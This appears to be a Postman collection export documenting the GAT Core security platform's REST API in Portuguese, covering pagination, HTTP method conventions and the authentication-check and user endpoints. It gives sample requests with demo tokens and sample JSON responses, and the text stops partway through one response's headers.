{"info":{"_postman_id":"4733227f-6be0-4a38-a8d1-507f49790bdf","name":"API GAT Core rev. 1.0","description":"<html><head></head><body><img src=\"https://www.gat.digital/wp-content/uploads/2021/05/logo-gat-padrao-positivo.png\">\n\n<p>A API do GAT Core foi pensada e desenvolvida com o intuito de ser fácil, mas ao mesmo tempo poderosa!</p>\n<p>O GAT Core é uma ferramenta que centraliza e unifica os dados relacionados à Segurança da Informação. Por isso, permitir que cada usuário tenha a possibilidade de integrar o GAT Core com qualquer outra ferramenta é fundamental.</p>\n<h2 id=\"como-obter-sua-chave-de-api\">Como obter sua Chave de API</h2>\n<p>Para obter sua Chave de API (API Key), siga os passos abaixo:</p>\n<ol>\n<li>Dentro do GAT, clique sobre o seu nome (no canto direito superior) e, em seguida, em \"Profile\":</li>\n</ol>\n<img src=\"https://api-gat-imgs.s3-sa-east-1.amazonaws.com/click_profile.png\">\n\n<ol>\n<li>Clique no botão \"Obter a API Key\":</li>\n</ol>\n<img src=\"https://api-gat-imgs.s3-sa-east-1.amazonaws.com/click_gerar_api.png\">\n\n<ol>\n<li>Copie sua Chave de API:</li>\n</ol>\n<img src=\"https://api-gat-imgs.s3-sa-east-1.amazonaws.com/click_copiar_api.png\">\n\n<p>Tenha em mente que cada Chave de API é válida para uma única \"Company\". Ou seja, se o seu usuário tiver acesso a mais de uma \"Company\", você precisará seguir esses passos dentro de cada uma.</p>\n<h1 id=\"estrutura-geral-da-api\">Estrutura Geral da API</h1>\n<p>Buscando facilitar o uso de nossa API, padronizamos as requisições, de modo a seguirem sempre o modelo a seguir:</p>\n<h2 id=\"paginação\">Paginação</h2>\n<p>Os métodos que retornam mais de um resultado (GET e POST) utilizam <strong>paginação</strong>. A paginação funciona utilizando os parâmetros <strong>size</strong> e <strong>page</strong> na URL da requisição. Por padrão (se os parâmetros forem omitidos), o parâmetro <strong>size</strong> será 30 e o <strong>page</strong> será 0. O valor máximo para o parâmetro <strong>size</strong> é 200.</p>\n<p>Exemplo:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-bash\">curl -X GET https://instance/api/v1/users?size=150&amp;page=2\n\n</code></pre>\n<p>O resultado da requisição sempre retornará um objeto padrão, no seguinte formato:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-javascript\">{\n  \"content\": [\n    // Lista de Elementos\n  ],\n  \"pageable\": {\n    \"sort\": {\n      \"sorted\": true,\n      \"unsorted\": false\n    },\n    \"pageSize\": 3,\n    \"pageNumber\": 0,\n    \"offset\": 0,\n    \"paged\": true,\n    \"unpaged\": false\n  },\n  \"last\": false,\n  \"totalPages\": 3,\n  \"totalElements\": 8,\n  \"first\": true,\n  \"sort\": {\n    \"sorted\": true,\n    \"unsorted\": false\n  },\n  \"numberOfElements\": 8,\n  \"size\": 3,\n  \"number\": 0\n}\n\n</code></pre>\n<h2 id=\"métodos-http\">Métodos HTTP</h2>\n<h3 id=\"get\">GET</h3>\n<p>O método <strong>GET</strong> é utilizado para <strong>recuperar</strong> todos os elementos (paginados) ou um elemento específico (por ID). Se for utilizado para recuperar todos os elementos, a requisição e o resultado seguirão o modelo de paginação acima.</p>\n<p>Exemplos:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X GET https://instance/api/v1/users\n\n</code></pre><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X GET https://instance/api/v1/users/5ab548ebe12f5e056e329776\n\n</code></pre><h3 id=\"post\">POST</h3>\n<p>Diferente de algumas outras APIs, o método <strong>POST</strong> é utilizado para fazer uma <strong>busca com filtros</strong> (e não para adicionar um novo elemento no banco). A requisição e o resultado seguirão o modelo de paginação acima.</p>\n<p>Exemplo:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X POST https://instance/api/v1/users --data '{\"name\": \"Raphael\"}'\n\n</code></pre><h3 id=\"put\">PUT</h3>\n<p>Para <strong>adicionar</strong> um novo elemento no GAT, utiliza-se o método <strong>PUT</strong>.</p>\n<p>Exemplo:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X PUT https://instance/api/v1/users --data '{\"email\": \"email@exemplo.com\", \"nome\": \"Raphael\"}'\n\n</code></pre><h3 id=\"patch\">PATCH</h3>\n<p>O método <strong>PATCH</strong> é utilizado para <strong>atualizar</strong> determinado elemento.</p>\n<p>Exemplo:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X PATCH https://instance/api/v1/users/5ab548ebe12f5e056e329776 --data '{\"nome\": \"Raphael 2\"}'\n\n</code></pre><h3 id=\"delete\">DELETE</h3>\n<p>O método <strong>DELETE</strong> é utilizado para <strong>remover</strong> uma lista de elementos.</p>\n<p>Exemplo:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>curl -X DELETE https://instance.gat.digital/api/v1/users --data '{\"id\": [\"5bd780525ced7f65c39ceacd\"]}'\n\n</code></pre></body></html>","schema":"https://schema.getpostman.com/json/collection/v2.0.0/collection.json","toc":[{"content":"Estrutura Geral da API","slug":"estrutura-geral-da-api"}],"owner":"13656974","collectionId":"4733227f-6be0-4a38-a8d1-507f49790bdf","publishedId":"Uyxeq9LN","public":true,"customColor":{"top-bar":"FFFFFF","right-sidebar":"303030","highlight":"FF6C37"},"publishDate":"2023-11-17T19:39:15.000Z"},"item":[{"name":"v1.0","item":[{"name":"Me","item":[{"name":"Check Authentication","id":"0f99358c-c234-4f5d-923d-ed1784b8a895","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"noauth","isInherited":false},"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15000000000"}],"url":"https://<instance>/api/v1/me","description":"<p>Esse endpoint te permite checar se a autorização da sua chave de API está funcionando corretamente. Se a sua chave estiver correta, o servidor irá retornar um <em>status</em> \"200: OK\" junto com alguns detalhes relacionados ao seu usuário. Caso contrário, o servidor irá retornar um <em>status</em> \"401: Unauthorized\".</p>\n","urlObject":{"protocol":"https","path":["api","v1","me"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"2a80994c-37da-4f3d-a66a-81e5f5e15cd9","name":"Check Authentication","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"}],"url":"https://subdomain.gat.digital/api/v1/me"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Thu, 27 Jun 2019 18:58:32 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0ez4anornnvji1oxeqkxvjx52952.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=cba22c16-a75f-4537-bb1b-c0ee72710e13;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0ez4anornnvji1oxeqkxvjx52952.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"cba22c16-a75f-4537-bb1b-c0ee72710e13","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"name\": \"Firstname Lastname\",\n    \"email\": \"firstname.lastname@example.com\",\n    \"profile_id\": \"577ad992f5897949670a6e2f\"\n}"},{"id":"6395e565-d647-402d-aa52-123225a405cb","name":"Authentication Failed","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Bearer d3f8666c-a6af-4a94-98b9-f15000000000"}],"url":"https://subdomain.gat.digital/api/v1/me"},"status":"Unauthorized","code":401,"_postman_previewlanguage":"json","header":[{"key":"Cache-Control","value":"no-store","name":"Cache-Control","description":"Tells all caching mechanisms from server to client whether they may cache this object. It is measured in seconds"},{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Fri, 28 Jun 2019 13:59:21 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Pragma","value":"no-cache","name":"Pragma","description":"Implementation-specific headers that may have various effects anywhere along the request-response chain."},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"WWW-Authenticate","value":"Bearer realm=\"oauth2-resource\", error=\"invalid_token\", error_description=\"d3f8666c-a6af-4a94-98b9-f15000000000\"","name":"WWW-Authenticate","description":"Indicates the authentication scheme that should be used to access the requested entity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node012snr2afn6bbipi2m0hx6481277.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"70b957c2-d2aa-4f64-8e02-263ed9e24a7f","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"error\":\"invalid_token\",\"error_description\":\"d3f8666c-a6af-4a94-98b9-f15000000000\"}"}],"_postman_id":"0f99358c-c234-4f5d-923d-ed1784b8a895"}],"id":"e9c67f82-0549-460a-b264-fa8edaf24ac3","description":"<p>O endpoint \"/me\" é utilizado para verificar se a autenticação está funcionando corretamente.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"82f3c663-708d-4aeb-b44e-982033142313"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"2f531bb4-1c90-4f4e-bb00-f1f66ca73b50"}}],"_postman_id":"e9c67f82-0549-460a-b264-fa8edaf24ac3"},{"name":"Usuários","item":[{"name":"Users","id":"fd6ac6f0-9e62-4d67-8958-47e9a8c246f5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8"}],"url":"https://<instance>/api/v1/users?size=30&page=0","description":"<p>Esse <em>endpoint</em> te permite recuperar os usuários cadastrados no GAT, com o resultado paginado.</p>\n","urlObject":{"protocol":"https","path":["api","v1","users"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"3143d136-71f1-41f2-a145-0b024a771906","name":"Retrieve the first 3 users","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"This is your API Key"}],"url":{"raw":"https://subdomain.gat.digital/api/v1/users?size=3&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","users"],"query":[{"key":"size","value":"3","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Thu, 13 Jun 2019 22:20:07 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node011it5nmcpsi0s11cbp2fcfsd8q701.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01cbdyazs93x2m1tjijai0szdp6705.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=080ba860-cd93-4fab-ae2d-ef3402f69284;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":true,"value":"node01cbdyazs93x2m1tjijai0szdp6705.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"demo.gat.digital","path":"/","secure":false,"value":"080ba860-cd93-4fab-ae2d-ef3402f69284","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"content\": [\n        {\n            \"email\": \"name1.surname1@example.com\",\n            \"username\": \"name1.surname1@example.com\",\n            \"name\": \"Name1 Surname1\",\n            \"team\": [\n                \"5c06b42f5ced7f075e0a3ef5\",\n                \"5c06b51a5ced7f075e0a3f82\",\n                \"5c8b857e5ced7f0a9bcaa14c\"\n            ],\n            \"enabled\": true,\n            \"user_id\": \"5a78b10e5ced7f0d5e0fc1c0\",\n            \"profile_id\": \"577ad992f5897949670a6e2f\",\n            \"bu_root\": true\n        },\n        {\n            \"email\": \"name2.surname2@example.com\",\n            \"username\": \"name2.surname2@example.com\",\n            \"name\": \"Name2 Surname2\",\n            \"team\": [\n                \"5c8b857e5ced7f0a9bcaa14c\"\n            ],\n            \"enabled\": true,\n            \"user_id\": \"5bb61ea85ced7f6a7f0a0ae0\",\n            \"profile_id\": \"577ad992f5897949670a6e2f\",\n            \"bu_root\": false\n        },\n        {\n            \"email\": \"name3.surname3@example.com\",\n            \"username\": \"name3.surname3@example.com\",\n            \"name\": \"Name3 Surname3\",\n            \"enabled\": false,\n            \"user_id\": \"5bd780525ced7f65c39ceacd\",\n            \"profile_id\": \"577ad992f5897949670a6e2f\",\n            \"bu_root\": true\n        }\n    ],\n    \"pageable\": {\n        \"sort\": {\n            \"sorted\": true,\n            \"unsorted\": false\n        },\n        \"pageSize\": 3,\n        \"pageNumber\": 0,\n        \"offset\": 0,\n        \"paged\": true,\n        \"unpaged\": false\n    },\n    \"last\": false,\n    \"totalPages\": 3,\n    \"totalElements\": 8,\n    \"first\": true,\n    \"sort\": {\n        \"sorted\": true,\n        \"unsorted\": false\n    },\n    \"numberOfElements\": 8,\n    \"size\": 3,\n    \"number\": 0\n}"}],"_postman_id":"fd6ac6f0-9e62-4d67-8958-47e9a8c246f5"},{"name":"User by ID","id":"305276a6-9b5d-41cb-a2a1-da8a4e30dff7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8"}],"url":"https://<instance>/api/v1/users/<user_id>","description":"<p>Esse <em>endpoint</em> permite recuperar um único Usuário, especificando seu ID. Se não tiver nenhum Usuário com o ID especificado, o servidor responderá com o código \"204: No Content\" (sem nada no corpo da resposta).</p>\n","urlObject":{"protocol":"https","path":["api","v1","users","<user_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"6d31b2b2-d801-47d0-82f4-1c80b412cc30","name":"Try to get a wrong User","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"This is your API Key"}],"url":"https://subdomain.gat.digital/api/v1/users/5ab548ebe12f5e056e32776"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Thu, 13 Jun 2019 21:54:02 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0tbyt0cuuxzf3rbqr9l1krbhs309.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node08ns2kqkppb481o9ku9fdi9esx310.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5d393045-3327-4334-8349-c04318e354d4;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node08ns2kqkppb481o9ku9fdi9esx310.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5d393045-3327-4334-8349-c04318e354d4","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"0e4dae40-0b74-468d-a090-5ecf8cf4dd17","name":"Get a User","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"This is your API Key"}],"url":"https://subdomain.gat.digital/api/v1/users/5ab548ebe12f5e056e329776"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Thu, 13 Jun 2019 21:47:33 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node09hdx9w9r1uykyy87aeffqvz5308.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0tbyt0cuuxzf3rbqr9l1krbhs309.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=3e93a88c-c0eb-4565-8d69-8cbb1e707abf;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0tbyt0cuuxzf3rbqr9l1krbhs309.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"3e93a88c-c0eb-4565-8d69-8cbb1e707abf","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\n    \"email\": \"first.last@example.com\",\n    \"username\": \"first.last@example.com\",\n    \"name\": \"First Last\",\n    \"team\": [\n        \"5c8c0817c569d543a1cfe732\",\n        \"5cacb985c569d522a02c27fa\"\n    ],\n    \"enabled\": true,\n    \"user_id\": \"5ab548ebe12f5e056e329776\",\n    \"profile_id\": \"577ad992f5897949670a6e2f\",\n    \"bu_root\": true\n}"}],"_postman_id":"305276a6-9b5d-41cb-a2a1-da8a4e30dff7"},{"name":"Search User with given filter","id":"f39d37a5-e5a3-4b14-b8ad-6219b1c23ed9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"<p>Your API Key</p>\n"}],"body":{"mode":"formdata","formdata":[{"key":"bu_root","value":"Bool","description":"<p>Wheter the User is the root of the Business Unit or not.</p>\n","type":"text"},{"key":"email","value":"List<String>","description":"<p>List of email addresses.</p>\n","type":"text"},{"key":"enabled","value":"Bool","description":"<p>Whether the User is enabled or not.</p>\n","type":"text"},{"key":"expiration_date","value":"Object","description":"<p>Object conatining \"operator\" and \"values\" as shown below.</p>\n","type":"text"},{"key":"expiration_date.operator","value":"String","description":"<p>\"eq\", \"gt\", \"lt\", \"gte\", \"lte\", \"neq\" (not equal) or \"btw\" (between).</p>\n","type":"text"},{"key":"expiration_date.values","value":"List<String>","description":"<p>A list containing 1 or 2 dates, depending on the operator. The Date format is: \"YYYY-MM-DDThh:mm:ss\".</p>\n","type":"text"},{"key":"name","value":"List<String>","description":"<p>List of names.</p>\n","type":"text"},{"key":"profile_id","value":"List<String>","description":"<p>List of Profile IDs. </p>\n","type":"text"},{"key":"team_id","value":"List<String>","description":"<p>List of Team IDs.</p>\n","type":"text"},{"key":"user_id","value":"List<String>","description":"<p>List of User IDs.</p>\n","type":"text"},{"key":"username","value":"List<String>","description":"<p>List of usernames.</p>\n","type":"text"}]},"url":"https://<instance>/api/v1/users?size=30&page=0","description":"<p>Esse <em>endpoint</em> te permite buscar determinados Usuários com base em um filtro especificado. O resultado vem paginado.</p>\n","urlObject":{"protocol":"https","path":["api","v1","users"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"22a1eb58-5ce2-4e44-a4db-b28ed0bd1290","name":"Send wrong type value to a parameter","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer 1b47827e-d452-40b2-9d1a-abae333315b8","description":"Your API Key"}],"body":{"mode":"raw","raw":"{\n\t\"email\": true\n}"},"url":{"raw":"https://subdomain.gat.digital/api/v1/users?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","users"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200"},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"plain","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Date","value":"Fri, 14 Jun 2019 10:12:39 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01arl8sjrlgmhh170bd1gapuxic747.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0ewlu71ibu4gmdwuqqrcm3kcj748.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=d7302208-23ba-421b-bbde-0de9f67d80f2;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: 